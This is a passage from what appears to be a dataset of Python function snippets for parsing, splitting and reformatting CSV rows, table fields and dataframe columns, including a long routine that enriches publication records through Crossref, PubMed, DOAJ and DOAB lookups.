zip_longest_strings(broken_fields)\n )", "def prescribing_transform(row):\n # To match the prescribing table format in BigQuery, we have\n # to re-encode the date field as a bigquery TIMESTAMP and drop\n # a couple of columns\n row[10] = \"%s 00:00:00\" % row[10]\n del(row[3])\n del(row[-1])\n return row", "def filter(self, row):\r\n return list(itertools.compress(row, self.selectors))", "def FE_split_one_field_into_many(df_in, field, splitter, filler, new_names_list='', add_count_field=False):\r\n df_field = df_in[field].values\r\n df = copy.deepcopy(df_in)\r\n ### First copy whatever is in that field so we can save it for later ###\r\n df[field].fillna(filler, inplace=True)\r\n if add_count_field:\r\n ### there will be one extra field created when we count the number of contents in each field ###\r\n max_things = df[field].map(lambda x: len(x.split(splitter))).max() + 1\r\n else:\r\n max_things = df[field].map(lambda x: len(x.split(splitter))).max()\r\n if len(new_names_list) == 0:\r\n print(' Max. columns created by splitting %s field is %d.' %(\r\n field,max_things))\r\n else:\r\n if not max_things == len(new_names_list):\r\n print(\"\"\" Max. columns created by splitting %s field is %d but you have given %d \r\n variable names only. Selecting first %d\"\"\" %(\r\n field,max_things,len(new_names_list),len(new_names_list)))\r\n ### This creates a new field that counts the number of things that are in that field.\r\n if add_count_field:\r\n #### this counts the number of contents after splitting each row which varies. Hence it helps.\r\n num_products_viewed = 'Content_Count_in_'+field\r\n df[num_products_viewed] = df[field].map(lambda x: len(x.split(splitter))).values\r\n ### Clean up the field such that it has the right number of split chars otherwise add to it\r\n ### This fills up the field with empty strings between each splitter. You can't do much about it.\r\n #### Leave this as it is. It is not something you can do right now. It works.\r\n fill_string = splitter + filler\r\n df[field] = df[field].map(lambda x: x+fill_string*(max_things-len(x.split(splitter))) if len(\r\n x.split(splitter)) < max_things else x)\r\n ###### Now you create new fields by split the one large field ########\r\n if isinstance(new_names_list, str):\r\n if new_names_list == '':\r\n new_names_list = [field+'_'+str(i) for i in range(1,max_things+1)]\r\n else:\r\n new_names_list = [new_names_list]\r\n ### First fill empty spaces or NaNs with filler ###\r\n df.loc[df[field] == splitter, field] = filler\r\n for i in range(len(new_names_list)):\r\n try:\r\n df[new_names_list[i]] = df[field].map(lambda x: x.split(splitter)[i]\r\n if splitter in x else filler)\r\n except:\r\n df[new_names_list[i]] = filler\r\n continue\r\n ### there is really nothing you can do to fill up since they are filled with empty strings.\r\n #### Leave this as it is. It is not something you can do right now. It works.\r\n df[field] = df_field\r\n return df, new_names_list", "def _add_from_list(self, row) :\n\n data = [0]\n data.extend(row[:len(self.cols)-1])\n cols = self.cols[:len(data)]\n self._insert_internal(cols, data)", "def _format_column(self, row_data):\n return [[row[i] for row in row_data] for i in range(self.row_length)]", "def parse_csv_row(self, row):\n\n for key in self.field_map:\n if self.field_map[key] is not None:\n if key == 'marking':\n self.obstacle_data[key] = self.get_marking_value(row[self.field_map[key]].strip())\n elif key == 'lighting':\n self.obstacle_data[key] = self.get_lighting_value(row[self.field_map[key]].strip())\n elif key == 'obst_type':\n self.obstacle_data['obst_type_id'] = self.get_obstacle_type_id(row[self.field_map[key]].strip())\n else:\n self.obstacle_data[key] = row[self.field_map[key]].strip()", "def _extract(self, row):\n if not self._head:\n self._head = self._create_head(row)\n if self._args.head:\n return\n\n if 'extract' not in self._state:\n self._state['extract'] = self._replace_fields(self._args.extract)\n\n r = list(map(self._convert, row))\n return eval(self._state['extract'])", "def parse_row(row):\n station_id = parse_substation_code(row)\n date_and_time = parse_date_and_time(row)\n depth = parse_depth(row)\n quality_code = parse_quality_code(row)\n value = parse_value(row)\n return [station_id, date_and_time, depth, quality_code, value]", "def extractFields(line, delim, keepIndices):\n\titems = line.split(delim)\n\tnewLine = []\n\tfor i in keepIndices:\n\t\tnewLine.append(line[i])\n\treturn delim.join(newLine)", "def _parse_row(self, record):\n original_record = record\n reverse_record = record[::-1]\n # Records contain null bitmaps for columns. The number of bitmaps is the number of columns / 8 rounded up\n null_table_len = (self.table_header.column_count + 7) // 8\n if null_table_len and null_table_len < len(original_record):\n null_table = record[-null_table_len:]\n # Turn bitmap to a list of True False values\n null_table = [((null_table[i // 8]) & (1 << (i % 8))) != 0 for i in range(len(null_table) * 8)]\n else:\n logging.error(f\"Failed to parse null table column count {self.table_header.column_count}\")\n return\n if self.version > 3:\n field_count = struct.unpack_from(\"h\", record)[0]\n record = record[2:]\n else:\n field_count = struct.unpack_from(\"b\", record)[0]\n record = record[1:]\n\n relative_records_column_map = {}\n # Iterate columns\n for i, column in self.columns.items():\n # Fixed length columns are handled before variable length. If this is a variable length column add it to\n # mapping and continue\n if not column.column_flags.fixed_length:\n relative_records_column_map[i] = column\n continue\n\n self._parse_fixed_length_data(record, column, null_table)\n if relative_records_column_map:\n relative_records_column_map = dict(sorted(relative_records_column_map.items()))\n metadata = self._parse_dynamic_length_records_metadata(reverse_record, original_record,\n null_table_len)\n if not metadata:\n return\n self._parse_dynamic_length_data(original_record, metadata, relative_records_column_map)", "def __parse_line(self, line: str) -> list:\n row = line.split(' ')\n for i in range(len(row)-1):\n row[i] = int(row[i])\n row = row[0:-1]\n return row", "def line_to_list(self, _line):\n\n\t\tresult = list()\t\t\n\t\t_line_splited = _line.split('\\t')\n\t\t\n\t\tfor value in _line_splited:\n\t\t\tvalue_stripped = value.strip().rstrip()\t\t\t\n\t\t\tresult.append(value_stripped)\t\t\t\t\n\t\t\n\t\treturn result", "def csv_to_field_Urls(entity, value):\n if value is None or value == '':\n return\n splitter = re.compile(url_splitter)\n entity.string = splitter.split(value)", "def _transform_row_model(\n rowkey: str, row: dict, sep: str\n) -> models.RowModelOdd:\n keys = [\"sid\", \"lid\", \"mid\", \"mkt\", \"seq\", \"per\", \"vendor\", \"ts\"]\n info_list: list = [\"s\", \"per\", \"et\"]\n\n row_dict = dict(zip(keys, rowkey.split(sep)))\n row_dict[\"info\"] = {}\n row_dict[\"odds\"] = {}\n row_model = models.RowModelOdd(**row_dict)\n \n info_dict: dict = {}\n for col in info_list:\n col_name = \":\".join([\"info\", col])\n info_dict[col] = row[col_name.encode(\"utf-8\")]\n row_model.info = models.OddInfoModel(**info_dict)\n\n target_cols = _get_target_column_list(row_model.mkt)\n odds_dict: dict = {}\n for col in target_cols:\n col_name = \":\".join([\"odds\", col])\n odds_dict[col] = row[col_name.encode(\"utf-8\")]\n\n odd_model = None\n mkt: str = row_model.mkt\n if mkt.startswith(\"1x2\"):\n odd_model = models.ColumnModel1x2(**odds_dict)\n elif mkt.startswith(\"ah\"):\n odd_model = models.ColumnModelAH(**odds_dict)\n else:\n odd_model = models.ColumnModelOU(**odds_dict)\n\n row_model.odds = odd_model\n\n return row_model", "def fix_dates(self, row):\r\n for field in self.date_fields:\r\n if field in row:\r\n if not type(row[field]) is datetime:\r\n try:\r\n row[field] = datetime.fromtimestamp(float(row[field]))\r\n except Exception as e:\r\n row[field] = None", "def _split(self, sql):\n\n placeholder = \"\\ufffc\" # unicode object replacement character\n\n if self._delimiter == ';':\n return sqlparse.split(sql)\n\n # We must find a string that original sql does not contain.\n # Most likely, our placeholder is enough, but if not, keep looking\n while placeholder in sql:\n placeholder += placeholder[0]\n sql = sql.replace(';', placeholder)\n sql = sql.replace(self._delimiter, ';')\n\n split = sqlparse.split(sql)\n\n return [\n stmt.replace(';', self._delimiter).replace(placeholder, ';')\n for stmt in split\n ]", "def _reduce_datetimes(row):\n\n row = list(row)\n\n for i, val in enumerate(row):\n if hasattr(val, \"strftime\"):\n row[i] = val.strftime(\"%Y-%m-%d %H:%M:%S\")\n elif hasattr(val, 'isoformat'):\n row[i] = val.isoformat()\n return tuple(row)", "def format_row(self, row):\n raise NotImplementedError()", "def rows(file, prep=None,\n whitespace='[\\n\\r\\t]',\n comments='#.*',\n sep=\",\"\n ):\n doomed = re.compile('(' + whitespace + '|' + comments + ')')\n with open(file) as fs:\n for line in fs:\n line = re.sub(doomed, \"\", line)\n if line:\n row = map(lambda z: z.strip(), line.split(sep))\n if len(row) > 0:\n yield prep(row) if prep else row", "def _filter(self, row):\n if not self._head:\n self._head = self._create_head(row)\n if self._args.head:\n return row\n\n if 'cond' not in self._state:\n self._state['cond'] = self._replace_fields(self._args.cond)\n\n r = list(map(self._convert, row))\n if eval(self._state['cond']):\n return row", "def left_to_right(data, key, col_tuple, col_tuples, re_tuples, cnt):\n if cnt == 0:\n data[\"tmp\"] = data[col_tuple[0]].astype(str).str.extract(re_tuples[cnt][0],\n expand=True)\n data[col_tuple[1]] = data[col_tuple[1]].fillna(data[\"tmp\"].str.strip())\n data[col_tuple[0]] = data[col_tuple[0]].astype(str).str.extract(re_tuples[cnt][1].format(key),\n expand=True)\n data = data.drop(columns=\"tmp\")\n return data\n else:\n data[\"tmp\"] = data[col_tuple[0]].astype(str).str.extract(re_tuples[cnt][0],\n expand=True)\n data[col_tuple[1]] = data[col_tuple[1]].fillna(data[\"tmp\"].str.strip())\n data[col_tuple[0]] = data[col_tuple[0]].astype(str).str.extract(re_tuples[cnt][1],\n expand=True)\n data = data.drop(columns=\"tmp\")\n return data", "def split_column(df,col_name,reg_ex=',',keep=False):\n # https://stackoverflow.com/a/51680292/5847441\n df = df.select(col_name,posexplode(split(col_name,reg_ex)).alias('pos','val'))\\\n .select(col_name,concat(lit(col_name),col('pos').cast('string')).alias('name'),'val')\\\n .groupBy(col_name).pivot('name').agg(first('val'))\n if keep:\n return df\n else:\n return df.drop(col_name)", "def split_data(lines_in):\n rows = []\n for line in lines_in:\n field = []\n\n for i in line.split(\"\\t\"):\n field.append(i)\n rows.append(field)\n\n rows = rows[1:] # strip header\n\n return rows", "def translate_fields_reader(data_lines, field_translations_path, delimiter):\n reader = csv.DictReader(data_lines, delimiter=delimiter)\n fieldtranslation_lines = utils.retrieve_file_lines(field_translations_path)\n\n if len(fieldtranslation_lines) < 2:\n return reader\n\n original_keys = data_lines[0]\n fieldname_keys = fieldtranslation_lines[0].split(delimiter)\n fieldname_values = fieldtranslation_lines[1].split(delimiter)\n\n # Filters the fields within a Dictionary and maps them to the specified\n # fieldvalue names so that only fields specified in the field translations\n # document are returned\n def field_filter(it, keys, fieldvalues):\n for d in it:\n yield dict((fieldvalues[keys.index(k)], d[k]) for k in keys if k in original_keys and k != \"\")\n\n return field_filter(reader, fieldname_keys, fieldname_values)", "def test_init_with_field_dict_and_custom_field_separator(self):\n fields = {\n 'Column 1': 'a=${aaa}',\n 'Column 2': 'b=${bbb}',\n 'Column 3': 'c=${ccc}',\n }\n csv_formatter = CSVFormatter(fields=fields, sep=\" || \")\n csv = csv_formatter.format_records(self.records)\n\n csv_expected = textwrap.dedent(\"\"\"\\\n #Column 1 || Column 2 || Column 3\n a=foobar_01 || b=8 || c=4898FE19\n a=foobar_02 || b=160 || c=5825D187\n a=foobar_03 || b=99 || c=3648A436\n \"\"\")\n\n assert csv == csv_expected", "def remFields(line, delim, remIndices):\n\titems = line.split(delim)\n\tnewLine = []\n\tfor i in range(len(items)):\n\t\tif not arrayContains(remIndices, i):\n\t\t\tnewLine.append(line[i])\n\treturn delim.join(newLine)", "def __convert_two_cols(raw_array: list, num_rows: int):\n\n # no need to check extra row, we can go right into conversions\n for i in range(num_rows):\n\n # float conversion\n float_value = float(raw_array[i][1])\n raw_array[i][1] = float_value\n\n # no need to delete an extra entry,\n # we can just convert the existing string and assign it\n timestamp = pd.Timestamp(raw_array[i][0])\n raw_array[i][0] = timestamp\n\n return", "def f(data: Dict):\n if field in data and isinstance(data[field], List):\n data[field] = \",\".join(data[field])", "def test_leading_trailing_whitespaces_in_fields_are_stripped(self):\n self.df[\"new_concat_field_ae\"] = concat_fieldvalues(self.df, ['a', 'e'])\n\n expected_result_ae = pd.DataFrame({'new_concat_field_ae': ['x y12', 'y', 'x']})\n assert_series_equal(self.df[\"new_concat_field_ae\"], expected_result_ae['new_concat_field_ae'])", "def list_process(field, item_list:List[str]):\n # if isinstance(item_list, list):\n if len(item_list) == 0:\n return {\n\n }\n saved_list = []\n\n for i in item_list:\n saved_list.append(f\"{i}\")\n return {\n field: \",\".join(saved_list)\n }", "def right_to_left(data, key, col_tuple, col_tuples, re_tuples,\n re_triple, cnt):\n first_col = col_tuples[0]\n second_col = col_tuples[1]\n if col_tuple == first_col or col_tuple == second_col:\n if col_tuple == first_col:\n data[\"tmp_0\"] = data[col_tuple[1]].astype(str).str.extract(re_triple[cnt][0].format(key),\n expand=True)\n else:\n data[\"tmp_0\"] = data[col_tuple[1]].astype(str).str.extract(re_triple[cnt][0],\n expand=True)\n data[\"tmp_1\"] = data[\"tmp_0\"].str.extract(re_triple[cnt][1],\n expand=True)\n if col_tuple == first_col:\n regex = re_triple[cnt][2].format(key)\n data[\"tmp_0\"] = data[\"tmp_0\"].str.extract(regex, expand=True)\n else:\n regex = re_triple[cnt][2]\n data[\"tmp_0\"] = data[\"tmp_0\"].str.extract(regex, expand=True)\n tmp_0_clean = data[\"tmp_0\"].str.strip()\n data[col_tuple[0]] = data[col_tuple[0]].fillna(tmp_0_clean)\n if col_tuple == first_col:\n data[col_tuple[1]] = data[col_tuple[1]].replace(re_triple[cnt][0].format(key),\n np.NaN, regex=True)\n else:\n data[col_tuple[1]] = data[col_tuple[1]].replace(re_triple[cnt][0][:-15]+\")\",\n np.NaN, regex=True)\n data[col_tuple[1]] = data[col_tuple[1]].replace(re_triple[cnt][0],\n np.NaN, regex=True)\n tmp_1_clean = data[\"tmp_1\"].str.strip()\n data[col_tuple[1]] = data[col_tuple[1]].fillna(tmp_1_clean)\n data = data.drop(columns=\"tmp_0\")\n data = data.drop(columns=\"tmp_1\")\n return data", "def process_group(row):\n splitted_name = row.name.split(extreme_separator)\n return sorted(splitted_name) + [row[2]]", "def convert_line(line):\n line = line.strip().replace(\"]\", \"\").replace(\"[\", \"\")\n return line.split(\",\")", "def fix_multiallelics(cell):\n\tsplitters = [',', ';']\n\tif any(splitter in str(cell) for splitter in splitters):\n\t\tcell = re.split(';|,', cell)[0]\n\treturn cell", "def split_records(\n items: Iterable,\n content_field: str | int,\n itemwise: bool = False,\n) -> Iterable:\n if itemwise is True:\n return ((item.pop(content_field), item) for item in items)\n else:\n return unzip(((item.pop(content_field), item) for item in items))", "def transform_table_data(tableRows: list, table: bigquery.Table):\n colSchema: list = table.schema\n assert len(tableRows[0]) <= len(colSchema), f'table should have at most as many columns as its schema: {len(tableRows[0])} ! <= {len(colSchema)}'\n formatter = []\n for schemaField in colSchema:\n fn = None\n if schemaField.field_type in ('INT64', 'INTEGER'):\n fn = get_as_int\n elif schemaField.field_type == ('FLOAT64', 'FLOAT'):\n fn = float\n elif schemaField.field_type != 'STRING': print(schemaField.field_type)\n formatter.append(fn)\n\n for row in tableRows:\n for (idx, val) in enumerate(row):\n fn = formatter[idx]\n if fn is not None:\n result = fn(val)\n row[idx] = result if result is not None else 0\n return", "def datetime_column(filepath, skiprows, skipcolumns):\n df = pd.read_csv(filepath, skiprows=skiprows)\n df = df.drop(columns = skipcolumns)\n# df = df.head(10)\n \n# return df\n\n def try_parse(df):\n# print(df.iloc[1, :])\n # try parsing some rows from each column as date\n head = df.head()\n tail = df.tail()\n for column in df.columns:\n try:\n# print(dateutil.parser.parse(df[column].iloc[-1]))\n dt_head = dateutil.parser.parse(head[column].iloc[-1])\n dt_tail = dateutil.parser.parse(tail[column].iloc[-1])\n# print('possible datetime')\n# if not date.time() == datetime.time():\n if not dt_head.time() == dt_tail.time():\n if not dt_head.date() == dt_tail.date():\n # time seems to be present (not default parser value)\n return column\n except:\n continue\n return None\n \n # try without modifying values\n rv = try_parse(df=df)\n if rv:\n return rv\n \n # try modifying values\n chars = ['-', '_', '/', '#']\n for char in chars:\n dfc = df.copy()\n for col in dfc.columns:\n try:\n dfc[col] = dfc[col].str.split(char).str.join(' ')\n except:\n pass # will only work for str type\n# print(char, dfc.iloc[1, :])\n rv = try_parse(df=dfc)\n if rv:\n return rv", "def fix_values(df, col):\n broken_values = [value for value in df[col]]\n fixed_values = []\n for value in broken_values:\n fixed_values.append(int(value.replace(',','')\n .replace('$','')))\n df[col] = fixed_values", "def _reformat_csv(self, csv):\n\n # avoid using extra backslashes because sed uses them as delimiter\n date = csv[-19:-9].replace('/', '-')\n cmds = [f'cut -d , -f 1 --complement <{csv} >{csv}.new',\n f'mv {csv}.new {csv}',\n f'sed -i \"1d\" {csv}',\n f'sed -i \"s/AS//g\" {csv}',\n f'sed -i \"s/,/\\t/g\" {csv}',\n f'sed -i \"s/$/\\t{date}/\" {csv}']\n\n utils.run_cmds(cmds)", "def format_row(values, num_decimal=3):\n new_vals = []\n for val in values:\n if np.isnan(val):\n new_val = NA_REP\n elif isinstance(val, numbers.Number):\n new_val = text_util.format_num(val, num_decimal=num_decimal)\n else:\n new_val = val\n new_vals.append(new_val)\n\n return new_vals", "def clean(self, value):\n return [f.clean(v) for v,f in zip(value, self.fields)]", "def split_mapping_file_on_field(mapping_f,\r\n mapping_field,\r\n column_rename_ids=None,\r\n include_repeat_cols=True):\r\n\r\n mapping_f = list(mapping_f)\r\n mapping_values = get_mapping_values(mapping_f, mapping_field)\r\n\r\n mapping_data, mapping_headers, _ = parse_mapping_file(mapping_f)\r\n\r\n if column_rename_ids:\r\n try:\r\n column_rename_ids = mapping_headers.index(column_rename_ids)\r\n except ValueError:\r\n raise KeyError(\"Field is not in mapping file (search is case \" +\r\n \"and white-space sensitive). \\n\\tProvided field: \" +\r\n \"%s. \\n\\tValid fields: %s\" % (mapping_field, ' '.join(mapping_headers)))\r\n\r\n for v in mapping_values:\r\n v_fp_str = v.replace(' ', '_')\r\n sample_ids_to_keep = sample_ids_from_metadata_description(\r\n mapping_f, valid_states_str=\"%s:%s\" % (mapping_field, v))\r\n\r\n # parse mapping file each time though the loop as filtering operates on\r\n # values\r\n mapping_data, mapping_headers, _ = parse_mapping_file(mapping_f)\r\n mapping_headers, mapping_data = filter_mapping_file(\r\n mapping_data,\r\n mapping_headers,\r\n sample_ids_to_keep,\r\n include_repeat_cols=include_repeat_cols,\r\n\r\n column_rename_ids=column_rename_ids)\r\n yield v_fp_str, format_mapping_file(mapping_headers, mapping_data)", "def _curate_data(data):\n new_data = []\n for row in data:\n flag = True\n new_row = []\n for col in row:\n if col == 'NA':\n flag = False\n break\n else:\n new_row.append(ast.literal_eval(col))\n\n if flag:\n new_data.append(new_row)\n\n return np.asarray(new_data)", "def process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup=False, no_pubmed_lookup=False,\n no_doaj_lookup=False, no_title_lookup=False, round_monetary=False,\n offsetting_mode=None, orig_file_path=None, crossref_max_retries=3):\n if len(row) != num_required_columns:\n msg = \"Line %s: \" + MESSAGES[\"num_columns\"]\n logging.error(msg, row_num, len(row), num_required_columns)\n return row\n\n empty_row = True\n for elem in row:\n if has_value(elem):\n empty_row = False\n break\n else:\n msg = \"Line %s: \" + MESSAGES[\"empty_row\"]\n logging.warning(msg, row_num)\n\n current_row = {}\n record_type = None\n\n # Copy content of identified columns and apply special processing rules\n for csv_column in column_map.values():\n index, column_type = csv_column.index, csv_column.column_type\n if empty_row:\n current_row[column_type] = \"\"\n continue\n if column_type == \"euro\" and index is not None:\n current_row[\"euro\"] = _process_euro_value(row[index], round_monetary, row_num, index, offsetting_mode)\n elif column_type == \"period\" and index is not None:\n current_row[\"period\"] = _process_period_value(row[index], row_num)\n elif column_type == \"is_hybrid\" and index is not None:\n current_row[\"is_hybrid\"] = _process_hybrid_status(row[index], row_num)\n elif column_type == \"institution\" and index is not None:\n current_row[\"institution\"] = _process_institution_value(row[index], row_num, orig_file_path, offsetting_mode)\n else:\n if index is not None and len(row[index]) > 0:\n current_row[column_type] = row[index]\n else:\n current_row[column_type] = \"NA\"\n\n doi = current_row[\"doi\"]\n if not has_value(doi) and not empty_row:\n msg = (\"Line %s: No DOI found\")\n logging.info(msg, row_num)\n current_row[\"indexed_in_crossref\"] = \"FALSE\"\n # lookup ISBNs in crossref\n additional_isbns = [row[i] for i in additional_isbn_columns]\n found_doi, r_type = _isbn_lookup(current_row, row_num, additional_isbns, doab_analysis.isbn_handling)\n if r_type is not None:\n record_type = r_type\n if found_doi is not None:\n # integrate DOI into row and restart\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = found_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n # lookup the book title in Crossref\n lookup_title = current_row[\"book_title\"]\n if has_value(lookup_title):\n msg = (\"Line %s: Trying to look up the book title ('%s') in Crossref...\")\n logging.info(msg, row_num, lookup_title)\n book_doi = title_lookup(lookup_title, [\"book\", \"monograph\", \"reference-book\"])\n if book_doi:\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = book_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n if has_value(doi):\n # Normalise DOI\n norm_doi = get_normalised_DOI(doi)\n if norm_doi is not None and norm_doi != doi:\n current_row[\"doi\"] = norm_doi\n msg = MESSAGES[\"doi_norm\"].format(doi, norm_doi)\n logging.info(msg)\n doi = norm_doi\n # include crossref metadata\n if not no_crossref_lookup:\n crossref_result = get_metadata_from_crossref(doi)\n retries = 0\n while not crossref_result[\"success\"] and crossref_result[\"error_msg\"].startswith(\"HTTPError: 504\"):\n if retries >= crossref_max_retries:\n break\n # retry on gateway timeouts, crossref API is quite busy sometimes\n msg = \"%s, retrying...\"\n logging.warning(msg, crossref_result[\"error_msg\"])\n retries += 1\n crossref_result = get_metadata_from_crossref(doi)\n if not crossref_result[\"success\"]:\n exc = crossref_result[\"exception\"]\n # check if a preprint lookup is possible\n if not no_title_lookup and type(exc) == UnsupportedDoiTypeError and exc.doi_type == \"posted-content\":\n msg = (\"Line %s: Found a DOI with type 'posted_content' (%s). This might \" +\n \"be a case of a preprint DOI, trying to find the final version of the article...\")\n logging.info(msg, row_num, doi)\n if not exc.crossref_title:\n msg = \"Line %s: Preprint lookup failed, no title could be extracted.\"\n logging.warning(msg, row_num)\n else:\n article_doi = title_lookup(exc.crossref_title, [\"journal-article\"])\n if article_doi:\n logging.info(\"New DOI integrated, restarting enrichment for current line...\")\n index = column_map[\"doi\"].index\n row[index] = article_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n if crossref_result[\"success\"]:\n data = crossref_result[\"data\"]\n record_type = data.pop(\"doi_type\")\n logging.info(\"Crossref: DOI resolved: \" + doi + \" [\" + record_type + \"]\")\n current_row[\"indexed_in_crossref\"] = \"TRUE\"\n for key, value in data.items():\n new_value = _process_crossref_results(current_row, row_num, key, value)\n old_value = current_row[key]\n current_row[key] = column_map[key].check_overwrite(old_value, new_value)\n else:\n msg = \"Line %s: Crossref: Error while trying to resolve DOI %s: %s\"\n logging.error(msg, row_num, doi, crossref_result[\"error_msg\"])\n current_row[\"indexed_in_crossref\"] = \"FALSE\"\n # lookup ISBNs in crossref and try to find a correct DOI\n additional_isbns = [row[i] for i in additional_isbn_columns]\n found_doi, r_type = _isbn_lookup(current_row, row_num, additional_isbns, doab_analysis.isbn_handling)\n if r_type is not None:\n record_type = r_type\n if found_doi is not None:\n # integrate DOI into row and restart\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = found_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n # include pubmed metadata\n if not no_pubmed_lookup and record_type == \"journal-article\":\n pubmed_result = get_metadata_from_pubmed(doi)\n if pubmed_result[\"success\"]:\n logging.info(\"Pubmed: DOI resolved: \" + doi)\n data = pubmed_result[\"data\"]\n for key, value in data.items():\n if value is not None:\n new_value = value\n else:\n new_value = \"NA\"\n msg = \"WARNING: Element %s not found in in response for doi %s.\"\n logging.debug(msg, key, doi)\n old_value = current_row[key]\n current_row[key] = column_map[key].check_overwrite(old_value, new_value)\n else:\n msg = \"Line %s: Pubmed: Error while trying to resolve DOI %s: %s\"\n logging.error(msg, row_num, doi, pubmed_result[\"error_msg\"])\n\n # lookup in DOAJ. try the EISSN first, then ISSN and finally print ISSN\n if not no_doaj_lookup and not empty_row:\n issns = []\n new_value = \"NA\"\n if current_row[\"issn_electronic\"] != \"NA\":\n issns.append(current_row[\"issn_electronic\"])\n if current_row[\"issn\"] != \"NA\":\n issns.append(current_row[\"issn\"])\n if current_row[\"issn_print\"] != \"NA\":\n issns.append(current_row[\"issn_print\"])\n for issn in issns:\n lookup_result = doaj_analysis.lookup(issn)\n if lookup_result:\n msg = \"DOAJ: Journal ISSN (%s) found in DOAJ offline copy ('%s').\"\n logging.info(msg, issn, lookup_result)\n new_value = \"TRUE\"\n break\n else:\n msg = \"DOAJ: Journal ISSN (%s) not found in DOAJ offline copy.\"\n new_value = \"FALSE\"\n logging.info(msg, issn)\n old_value = current_row[\"doaj\"]\n current_row[\"doaj\"] = column_map[\"doaj\"].check_overwrite(old_value, new_value)\n if record_type != \"journal-article\" and not empty_row:\n collected_isbns = []\n for isbn_field in [\"isbn\", \"isbn_print\", \"isbn_electronic\"]:\n # test and split all ISBNs\n current_row[isbn_field] = _process_isbn(row_num, current_row[isbn_field], doab_analysis.isbn_handling)\n if has_value(current_row[isbn_field]):\n collected_isbns.append(current_row[isbn_field])\n additional_isbns = [row[i] for i in additional_isbn_columns]\n for isbn in additional_isbns:\n result = _process_isbn(row_num, isbn, doab_analysis.isbn_handling)\n if has_value(result):\n collected_isbns.append(result)\n if len(collected_isbns) == 0:\n logging.info(\"No ISBN found, skipping DOAB lookup.\")\n current_row[\"doab\"] = \"NA\"\n else:\n record_type = \"book\"\n logging.info(\"Trying a DOAB lookup with the following values: \" + str(collected_isbns))\n for isbn in collected_isbns:\n doab_result = doab_analysis.lookup(isbn)\n if doab_result is not None:\n current_row[\"doab\"] = \"TRUE\"\n msg = 'DOAB: ISBN %s found in normalized DOAB (%s, \"%s\")'\n logging.info(msg, isbn, doab_result[\"publisher\"], doab_result[\"book_title\"])\n if current_row[\"indexed_in_crossref\"] == \"TRUE\":\n msg = \"Book already found in Crossref via DOI, those results take precedence\"\n logging.info(msg)\n else:\n for key in doab_result:\n current_row[key] = doab_result[key]\n if not has_value(current_row[\"isbn\"]):\n current_row[\"isbn\"] = isbn\n break\n else:\n current_row[\"doab\"] = \"FALSE\"\n msg = \"DOAB: None of the ISBNs found in DOAB\"\n logging.info(msg)\n if offsetting_mode:\n current_row[\"agreement\"] = offsetting_mode\n record_type = \"journal-article_transagree\"\n\n if record_type is None:\n msg = \"Line %s: Could not identify record type, using default schema 'journal-article'\"\n logging.warning(msg, row_num)\n record_type = \"journal-article\"\n\n result = []\n for field in COLUMN_SCHEMAS[record_type]:\n result.append(current_row[field])\n\n return (record_type, result)", "def pluck(field_name, rows):\n return map(picker(field_name), rows)", "def pluck(field_name, rows):\n return map(picker(field_name), rows)", "def line_to_row(line):\n m = line_re.match(line)\n if m:\n # TODO \n return m.group(1), m.group(2)\n else:\n return None", "def processRow(self, row=None, pdata=None):\n\t\tcol_name2index = getattr(pdata, 'col_name2index', None)\n\t\txValue2yValueLs = getattr(pdata, 'xValue2yValueLs', None)\n\t\ty_ls = getattr(pdata, 'y_ls', None)\n\t\tif col_name2index and xValue2yValueLs is not None:\n\t\t\tif self.whichColumnHeader:\n\t\t\t\twhichColumn = col_name2index.get(self.whichColumnHeader, None)\n\t\t\telse:\n\t\t\t\twhichColumn = self.whichColumn\n\t\t\tx_index = col_name2index.get(self.xColumnHeader, None)\n\t\t\t\n\t\t\txValue = float(row[x_index])\n\t\t\txValue = self.processValue(xValue, processType=self.logX)\n\t\t\tyValue = float(row[whichColumn])\n\t\t\tyValue = self.processValue(yValue, processType=self.logY)\n\t\t\tif xValue not in xValue2yValueLs:\n\t\t\t\txValue2yValueLs[xValue] = []\n\t\t\txValue2yValueLs[xValue].append(yValue)\n\t\t\ty_ls.append(yValue)", "def _get_xls_row_vals(self, row):\n return [v.value for v in row]", "def line_split(self, line):\n\t\tline = re.sub(r\"`(.*?)'\", quote_replace, line)\n\t\tline = line.translate(None, '.:,()+*')\n\t\treturn line.split()", "def pre_process_multispace(filepath, delimiter=\" \"):\n newpath = filepath+\".rev.csv\"\n with open(filepath, \"r\") as src_csv_file:\n with open(newpath, \"w\") as dst_csv_file:\n for src_line in src_csv_file:\n dst_csv_file.write(delimiter.join(src_line.split())+\"\\n\")", "def parse_row(self, response, row):\n raise NotImplementedError", "def _splitFieldValue(self, line):\n found = self.FIELDVALUE.findall(line)\n if found:\n fieldName, value = found[0]\n if fieldName in self.C.ADAPTER_COMMAFIELDS:\n value = self.COMMASPLIT.findall(value)[:-1] # Split and remove last empty part\n return fieldName, value\n return None, None # No field name match on this line.", "def expandFromColumn(inputColumn,replaceList):\n \n import pandas as pd\n import re\n \n #necessary, due to escape nonsense\n inputColumn=inputColumn.replace(regex=True, to_replace='\\\\\\\\',value='/')\n \n replaceList['changeNum']=0\n replaceList['changeIndexes']=''\n\n for index, row in replaceList.iterrows():\n curReplaceVal=row[0]\n currentRegexExpression=re.compile(curReplaceVal)\n CurrentBoolVec=inputColumn.str.contains(currentRegexExpression,na=False)\n replaceList['changeIndexes'].iloc[index]=[i for i, x in 